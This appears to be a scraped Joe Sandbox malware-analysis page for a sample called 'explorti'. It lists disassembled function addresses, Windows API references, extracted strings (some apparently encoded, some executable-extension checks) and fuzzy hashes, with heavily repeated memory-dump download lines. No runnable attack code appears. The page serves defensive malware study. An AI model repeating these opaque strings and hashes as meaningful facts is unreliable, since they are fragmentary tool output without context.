Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 747bffb2810a90ec88e106793384183b5f54cb93d3c0260ca0ba926f7a30dde6
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 6DF15C71E006199BDF14CFA8D8806AEBBB1FF88354F15826DE919BB341D731AE01CB90

Function 00E3CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00E3CE82,?,?,?,?,00E3CEB7,?,?,?,?,?,?,00E3C42D,?,00000001), ref: 00E3CB33

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 15d3fad5180bf10c42da9e2f3290e8468b75f1ebfc84d897f979ba6cc84ed740
Instruction ID: 873163fd881b015edbafb3f17b806c8562df55c0a18595faaabf754ccbad8d51
Opcode Fuzzy Hash: 15d3fad5180bf10c42da9e2f3290e8468b75f1ebfc84d897f979ba6cc84ed740
Instruction Fuzzy Hash: 30D022336120389BCA022B91AC0C8ADFF088F01B507100111E808331218E11DC82ABE0

Function 00E57D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00E57EFF

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 1f1f1244edd7152b89ea0828abff2b1604573171e28ef11e9c72bce9e6116196
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: DC51567020C74856DB388A28A9967BF67AA9F1230BF143C5DDCC2F7681DE119D6D8351

Function 00E24AF0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

.k, xrefs: 00E24B0A

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: .k
API String ID: 0-549977249
Opcode ID: 2c5f1d561ad68734c28d20856a05fcaba2a3527b4762748a95cc64e917218860
Instruction ID: add05bcdb6665f208ae9e0a606c1cf2de75f448ba8b874bb75d91df10fe75f0b
Opcode Fuzzy Hash: 2c5f1d561ad68734c28d20856a05fcaba2a3527b4762748a95cc64e917218860
Instruction Fuzzy Hash: C451B1706087918FD319CF2D911523AFFE1BFD5200F084A9EE4EA97292D774DA04CB91

Function 00E24CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d925d6b16335492a5f87bae478b71ba24432ff2063cd5b27a4ff27bc3b2c2672
Instruction ID: f11bb523a04028293ca284785dc11eb62ad1380ab6f0d8a933144cce4a14faf2
Opcode Fuzzy Hash: d925d6b16335492a5f87bae478b71ba24432ff2063cd5b27a4ff27bc3b2c2672
Instruction Fuzzy Hash: AA2250B7F515144BDB0CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158A44

Function 00E66F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9fb61151b9ce01f761373a52014d9116d2d459d99de5dddf5d832ee7d63608b
Instruction ID: 6bd9ebe8a7af4a0bccdf8f5b0af8df5ae49dc30ffc17795745756845127994db
Opcode Fuzzy Hash: d9fb61151b9ce01f761373a52014d9116d2d459d99de5dddf5d832ee7d63608b
Instruction Fuzzy Hash: 44B17D31264608DFD714CF28D486BA57BE0FF453A8F259659E8D9DF2A1C335E982CB40

Function 00E6777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4495d6e675a58b3702067bc3cdc2aec2312f53e48fae7b712aaef84fd8008fd8
Instruction ID: 695cf1f3cb3e172e45ae74d4d780c941f85bb3c1cdf2e4becc9899a63633ec16
Opcode Fuzzy Hash: 4495d6e675a58b3702067bc3cdc2aec2312f53e48fae7b712aaef84fd8008fd8
Instruction Fuzzy Hash: 9621B673F204394B770CC57E8C5727DB6E1C78C541745423AE8A6EA2C1D968D917E2E4

Function 00E6765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d5aa9366b78e3001d53661153eb1ae4896b0580d9f5d928541e82496a7146a
Instruction ID: ed497e3373abf13f7041260f5cb92416acf78c4bc3a9e382df15e5caf09725b9
Opcode Fuzzy Hash: 63d5aa9366b78e3001d53661153eb1ae4896b0580d9f5d928541e82496a7146a
Instruction Fuzzy Hash: 2B117323F30C255A675C816D8C172BAA5D2EBD825471F533AD826FB284E9A4DE23D290

Function 00E68720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: f652656f2586efc32b43e5b16f6ad7379b63461f4bfcc726aecc30599627f316
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 3211387B2C014147D6048A2DFBF45B6AB96EAC53A9B3C637BC081EB758DE22B944D900

Function 00E5645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c26c9a63d43531368f58e01284d2e783fa58dea7a2c1e89a4c5a12e1ce35eab
Instruction ID: e8fe12e2524ddeadabb0d7e87bbbcb074cd81bbb5628978b4c25d01575b527af
Opcode Fuzzy Hash: 6c26c9a63d43531368f58e01284d2e783fa58dea7a2c1e89a4c5a12e1ce35eab
Instruction Fuzzy Hash: 16E08C31251A0CAFCE35BB14D92CD593B5AFF41346F806C10FC186B222CB35EC85CA80

Function 00E5A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: f3e6cc4f8a56bbe628e93403b070aacb195c1cfc0e9bca8390c55b0ae63133a5
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: E7E08C72912628EBCB15DBC8CA04D8AF7ECEB48B01F1949A6F901E3240C270DF04C7D0

Function 00E32E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

Dy==, xrefs: 00E3369E
stoi argument out of range, xrefs: 00E34269
6JLUcxtnEx==, xrefs: 00E32EC7
FAml, xrefs: 00E3378F
246122658369, xrefs: 00E333D4
invalid stoi argument, xrefs: 00E3425A
UFy=, xrefs: 00E333BA

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$6JLUcxtnEx==$Dy==$FAml$UFy=$invalid stoi argument$stoi argument out of range
API String ID: 0-3273830296
Opcode ID: 31234f97d3c38f16787633946745000fce5190a2538bc15898a768b633b79a4b
Instruction ID: dbe3b4ef5f2b56e31704e4394f801ee29dd2062acff8937ba799a5db14562a72
Opcode Fuzzy Hash: 31234f97d3c38f16787633946745000fce5190a2538bc15898a768b633b79a4b
Instruction Fuzzy Hash: 0402B171A00258EFEF24EFA8C849BDEBFB5EF05304F505558E805B7282D7759A84CBA1

Function 00E54770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00E547A7
___except_validate_context_record.LIBVCRUNTIME ref: 00E547AF
_ValidateLocalCookies.LIBCMT ref: 00E54838
__IsNonwritableInCurrentImage.LIBCMT ref: 00E54863
_ValidateLocalCookies.LIBCMT ref: 00E548B8

Strings

csm, xrefs: 00E5484D

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: bd38ecabb1d74fdef196bfc5a4e4f1ff068b65b19e8c5790bda20a1bd1dba531
Instruction ID: 470e137ffcd5b96670a293b5f736cb8cb40fb65cc0ae5dff456a607e9a2097b8
Opcode Fuzzy Hash: bd38ecabb1d74fdef196bfc5a4e4f1ff068b65b19e8c5790bda20a1bd1dba531
Instruction Fuzzy Hash: 4651F571A002489BCF14DF68C885AAE7BF5AF0531DF149855FC08BB392D731EA99CB90

Function 00E37870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 00E3795C
__Cnd_destroy_in_situ.LIBCPMT ref: 00E37968
__Mtx_destroy_in_situ.LIBCPMT ref: 00E37971

Strings

'k, xrefs: 00E37879, 00E3790B
d+, xrefs: 00E37904, 00E37912, 00E3790A
@y, xrefs: 00E3794A

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: 'k$@y$d+
API String ID: 4078500453-4247551799
Opcode ID: 94ec2c29c77bb8b547a579fba2b0ea668258e2043958ea1b5db5815e9c372ba8
Instruction ID: e278954d2858f7a17592836ee02881fd807b53e90399cb6b2848e0adf9b6fad7
Opcode Fuzzy Hash: 94ec2c29c77bb8b547a579fba2b0ea668258e2043958ea1b5db5815e9c372ba8
Instruction Fuzzy Hash: A43108B19043049FD734DF68E849B56BBE8EF58310F101A3EE986E7241E771EA44C7A1

Function 00E570C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00E5710B

Strings

.exe, xrefs: 00E57118
.com, xrefs: 00E5714B
.bat, xrefs: 00E5713A
.cmd, xrefs: 00E57129

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
